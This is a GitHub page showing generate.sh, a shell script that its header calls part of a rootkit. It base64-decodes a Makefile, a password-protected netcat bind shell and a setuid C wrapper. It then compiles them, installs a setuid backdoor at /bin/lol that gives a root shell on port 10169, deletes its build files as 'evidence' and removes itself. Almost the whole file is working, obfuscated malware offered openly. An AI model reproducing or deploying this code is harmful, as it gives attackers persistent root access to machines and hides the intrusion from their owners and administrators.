-
Notifications
You must be signed in to change notification settings - Fork 6
/
generate.sh
114 lines (105 loc) · 6.28 KB
/
generate.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/bin/bash
##################################################################
# Writes a backdoor suid nc shell to /bin/lol
# Connect with nc host 10169
# This file is part of shellolkit, a rookit written in pure shell.
# password: "omglolwtf"
##################################################################
#
# write Makefile
cat << _EOF_ |tr -d '\n'|base64 -d >Makefile
Q0MgOj0gZ2NjCk9CSkNPUFkgPz0gb2JqY29weQoKQ0ZMQUdTID89IC1nZ2RiIC1XYWxsIC1XZXJy
b3IgLVdleHRyYQoKU0NSSVBUIDo9IHNjcmlwdC5zaApTQ1JJUFRfT0JKRUNUUyA6PSAkKFNDUklQ
VDouc2g9Lm8pCgpTT1VSQ0VTIDo9IHN1aWRzaC5jClNPVVJDRVNfT0JKRUNUUyA6PSAkKFNPVVJD
RVM6LmM9Lm8pCgpPQkpFQ1RTIDo9ICQoU0NSSVBUX09CSkVDVFMpICQoU09VUkNFU19PQkpFQ1RT
KQoKQklOQVJZIDo9IHN1aWRzaAoKU0NSSVBUX05BTUVfU1lNIDo9ICQoc3Vic3QgLixfLCQoU0NS
SVBUKSkKCi5QSE9OWTogYWxsIGNsZWFuCgphbGw6ICQoQklOQVJZKQoKY2xlYW46CgkkKFJNKSAk
KE9CSkVDVFMpICQoQklOQVJZKQoKJChCSU5BUlkpOiAkKE9CSkVDVFMpCgkkKENDKSAkKENGTEFH
UykgJChMREZMQUdTKSAtbyAkQCAkXgoKJChTT1VSQ0VTX09CSkVDVFMpOiAlLm86ICUuYwoJJChD
QykgLWMgJChDRkxBR1MpICQoQ1BQRkxBR1MpIC1EU0NSSVBUX05BTUU9JChTQ1JJUFRfTkFNRV9T
WU0pIC1vICRAICQ8CgokKFNDUklQVF9PQkpFQ1RTKTogJS5vOiAlLnNoCgkkKE9CSkNPUFkpIC1J
IGJpbmFyeSAtTyBlbGY2NC14ODYtNjQgLUIgaTM4NiAtLXJlbmFtZS1zZWN0aW9uIC5kYXRhPS5y
b2RhdGEscmVhZG9ubHksZGF0YSxsb2FkLGNvbnRlbnRzLGFsbG9jICQ8ICRACg==
_EOF_
# write the script
cat << _EOF_ |tr -d '\n'|base64 -d >script.sh
IyEvYmluL2Jhc2gKCmhhc2g9IjAzZmVkNWI5OTBmYmMyZDY0ZGU5MDg1ZWY5YzY2ZDI0NTg2Yjkz
ODAiCmxvbG5vZGU9L3RtcC8ucm9mbAoKbG9sVXAoKXsKICBlY2hvICdDb25qdXJpbmcgYSByb290
IHNoZWxsIG9uIDpsb2w2OScKICBleHBvcnQgSElTVEZJTEU9L2Rldi9udWxsICMgIFN0dWZmIHRv
IHJ1biBiZWZvcmUgdGhlIHNoZWxsCiAgbWtub2QgJGxvbG5vZGUgcDsgKG5jIC1sIC1wIDEwMTY5
IHx8IG5jIC1sIDEwMTY5KTA8JGxvbG5vZGUgfCBcCiAgL2Jpbi9iYXNoID4kbG9sbm9kZSAyPiYx
OyBybSAkbG9sbm9kZQp9Cgp0cmFwICJybSAtZiAvdG1wLyRsb2xub2RlIC90bXAvLnBhc3MiIDEg
MiA4CgpjYXNlICQxIGluCi1wfC0tcGFzc3dvcmQpCnByaW50ZiAiJDIiID4vdG1wLy5wYXNzCjs7
CiopCnJlYWQgLXMgLXAgIkVudGVyIHRoZSBNYWdpYyBXb3JkOiAiIG1hZ2ljCnByaW50ZiAkbWFn
aWMgPi90bXAvLnBhc3MKOzsKZXNhYwoKaWYgZWNobyAiJGhhc2ggKi90bXAvLnBhc3MiIHwgc2hh
MXN1bSAtYyAtID4gL2Rldi9udWxsIDI+JjEgOyB0aGVuCiAgIGVjaG8gQWNjZXNzIEdyYW50ZWQh
CiAgIGxvbFVwICYKCmVsc2UKICBmb3IgaSBpbiBhIGIgYyBkIGU7IGRvCiAgICBlY2hvICJBSCEg
QUghIEFIISBZb3UgZGlkbid0IHNheSB0aGUgbWFnaWMgd29yZCEiCiAgICBzbGVlcCAxCiAgZG9u
ZQpmaQoKZXhpdAoK
_EOF_
# write the program
cat << _EOF_ |tr -d '\n'|base64 -d >suidsh.c
Ly8gRGVmaW5lZCBzbyB3ZSBnZXQgYXNwcmludGYKI2RlZmluZSBfR05VX1NPVVJDRQoKI2luY2x1
ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvd2FpdC5o
PgojaW5jbHVkZSA8cHdkLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHN0ZGxpYi5o
PgojaW5jbHVkZSA8ZXJybm8uaD4KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDxhc3Nl
cnQuaD4KI2luY2x1ZGUgPHN0ZGJvb2wuaD4KI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxp
bnR0eXBlcy5oPgoKI2lmbmRlZiBTQ1JJUFRfTkFNRQojZXJyb3IgU0NSSVBUX05BTUUgaXMgdW5k
ZWZpbmVkLiBZb3UgbXVzdCBzcGVjaWZ5IGEgc2NyaXB0IG5hbWUuCiNlbmRpZgoKI2RlZmluZSBQ
QVNURShhLCBiLCBjKSBhICMjIGIgIyMgYwojZGVmaW5lIFNUQVJUX1NZTShuYW1lKSBQQVNURShf
YmluYXJ5XywgbmFtZSwgX3N0YXJ0KQojZGVmaW5lIFNJWkVfU1lNKG5hbWUpIFBBU1RFKF9iaW5h
cnlfLCBuYW1lLCBfc2l6ZSkKCmV4dGVybiBjaGFyIFNUQVJUX1NZTShTQ1JJUFRfTkFNRSk7CmV4
dGVybiBzaXplX3QgU0laRV9TWU0oU0NSSVBUX05BTUUpOwoKY29uc3QgY2hhciAqc2NyaXB0ID0g
JlNUQVJUX1NZTShTQ1JJUFRfTkFNRSk7CmNvbnN0IHNpemVfdCBzaXplID0gKHNpemVfdCkgJlNJ
WkVfU1lNKFNDUklQVF9OQU1FKTsKCmNoYXIgdGVtcGxhdGVbXSA9ICIvdG1wL3NjcmlwdGV4ZWMu
WFhYWFhYWCI7Cgp2b2lkIGNsZWFudXAoKSB7CglpZiggdW5saW5rKHRlbXBsYXRlKSA9PSAtMSAp
CgkJcGVycm9yKCJ1bmxpbmsiKTsKfQoKdm9pZCBzZXRlbnZfaWZfZXhpc3RzKCBjb25zdCBjaGFy
ICpuYW1lLCBjb25zdCBjaGFyICp2YWx1ZSApIHsKCWlmKCBnZXRlbnYobmFtZSkgIT0gTlVMTCAp
IHsKCQlpZiggc2V0ZW52KG5hbWUsIHZhbHVlLCAxKSAhPSAwICkgewoJCQlwZXJyb3IoInNldGVu
diIpOwoJCQlleGl0KEVYSVRfRkFJTFVSRSk7CgkJfQoJfQp9CgppbnQgbWFpbiggaW50IGFyZ2Ms
IGNoYXIgKmNvbnN0IGFyZ3ZbXSApIHsKCSh2b2lkKSBhcmdjOwoKCXVpZF90IGV1aWQgPSBnZXRl
dWlkKCk7CglpZiggc2V0cmV1aWQoZXVpZCwgLTEpICE9IDAgKSB7CgkJcGVycm9yKCJzZXR1aWQi
KTsKCQlleGl0KEVYSVRfRkFJTFVSRSk7Cgl9CglzdHJ1Y3QgcGFzc3dkICpwYXNzd2QgPSBnZXRw
d3VpZChldWlkKTsKCWlmKCBwYXNzd2QgPT0gTlVMTCApIHsKCQlwZXJyb3IoImdldHB3dWlkIik7
CgkJZXhpdChFWElUX0ZBSUxVUkUpOwoJfQoJc2V0ZW52X2lmX2V4aXN0cygiVVNFUiIsIHBhc3N3
ZC0+cHdfbmFtZSk7CglzZXRlbnZfaWZfZXhpc3RzKCJIT01FIiwgcGFzc3dkLT5wd19kaXIpOwoJ
c2V0ZW52X2lmX2V4aXN0cygiU0hFTEwiLCBwYXNzd2QtPnB3X3NoZWxsKTsKCWNoYXIgKnN0cjsK
CWFzcHJpbnRmKCZzdHIsICIlanUiLCAodWludG1heF90KSBwYXNzd2QtPnB3X3VpZCk7CglzZXRl
bnZfaWZfZXhpc3RzKCJVSUQiLCBzdHIpOwoJZnJlZShzdHIpOwoJYXNwcmludGYoJnN0ciwgIiVq
dSIsICh1aW50bWF4X3QpIHBhc3N3ZC0+cHdfZ2lkKTsKCXNldGVudl9pZl9leGlzdHMoIkdJRCIs
IHN0cik7CglmcmVlKHN0cik7CgoJLyoKCSAqIFZFUlkgSU1QT1JUQU5UCgkgKgoJICogVGhlcmUg
aXMgYSBwb3RlbnRpYWwgc2VjdXJpdHkgdnVsbmVyYWJpbGl0eSBoZXJlLiBJZiBhbiBhdHRhY2tl
ciBpcyBhYmxlCgkgKiB0byByZXBsYWNlIHRoZSBmaWxlIHJldHVybmVkIGJ5IG1rc3RlbXAgYmVm
b3JlIHRoZSBjYWxsIHRvIGV4ZWMgb3IgdGhlCgkgKiBpbnRlcnByZXRlciBzcGVjaWZpZWQgaW4g
dGhlIHNoZWJhbmcgaXMgYWJsZSB0byByZWFkIHRoZSBmaWxlLCB0aGF0IHdvdWxkCgkgKiBiZSBi
YWQuCgkgKi8KCWludCB0bXBmZCA9IG1rc3RlbXAodGVtcGxhdGUpOwoJaWYoIHRtcGZkID09IC0x
ICkgewoJCXBlcnJvcigibWtzdGVtcCIpOwoJCWV4aXQoRVhJVF9GQUlMVVJFKTsKCX0KCWlmKCBh
dGV4aXQoY2xlYW51cCkgIT0gMCApIHsKCQlwZXJyb3IoImF0ZXhpdCIpOwoJCWV4aXQoRVhJVF9G
QUlMVVJFKTsKCX0KCgljb25zdCBjaGFyICpidWYgPSBzY3JpcHQ7CglzaXplX3QgYnVmc2l6ID0g
c2l6ZTsKCWRvIHsKCQllcnJubyA9IDA7CgkJc3NpemVfdCB3cml0dGVuID0gd3JpdGUodG1wZmQs
IGJ1ZiwgYnVmc2l6KTsKCQlpZiggd3JpdHRlbiA9PSAtMSAmJiBlcnJubyAhPSBFQUdBSU4gJiYg
ZXJybm8gIT0gRUlOVFIgKSB7CgkJCXBlcnJvcigid3JpdGUiKTsKCQkJZXhpdChFWElUX0ZBSUxV
UkUpOwoJCX0KCQlidWYgKz0gd3JpdHRlbjsKCQlidWZzaXogLT0gd3JpdHRlbjsKCX0gd2hpbGUo
IGJ1ZnNpeiAhPSAwICk7CglpZiggZmNobW9kKHRtcGZkLCBTX0lSVVNSIHwgU19JV1VTUiB8IFNf
SVhVU1IpID09IC0xICkgewoJCXBlcnJvcigiZmNobW9kIik7CgkJZXhpdChFWElUX0ZBSUxVUkUp
OwoJfQoJY2xvc2UodG1wZmQpOwoKCXBpZF90IGNwaWQgPSBmb3JrKCk7CglpZiggY3BpZCA9PSAt
MSApIHsKCQlwZXJyb3IoImZvcmsiKTsKCQlleGl0KEVYSVRfRkFJTFVSRSk7Cgl9IGVsc2UgaWYo
IGNwaWQgPT0gMCApIHsKCQlpZiggZXhlY3YodGVtcGxhdGUsIGFyZ3YpID09IC0xICkgewoJCQlw
ZXJyb3IoImV4ZWN2ZSIpOwoJCQlleGl0KEVYSVRfRkFJTFVSRSk7CgkJfQoJCWFzc2VydChmYWxz
ZSk7Cgl9IGVsc2UgewoJCWludCBzdGF0dXM7CgkJd2FpdHBpZChjcGlkLCAmc3RhdHVzLCAwKTsK
CQlyZXR1cm4gV0VYSVRTVEFUVVMoc3RhdHVzKTsKCX0KCWFzc2VydChmYWxzZSk7Cn0K
_EOF_
echo "Compiling lol..."
make
if [ "$?" -eq "0" ] ; then
mv suidsh /bin/lol
chmod u+s /bin/lol
echo "System backdoored ok! Deleting evidence..."
make clean
rm -f suidsh.c script.sh Makefile
echo "Deleting myself. Bye!"
rm $0
else
echo "Compilation FAILED!?"
fi
exit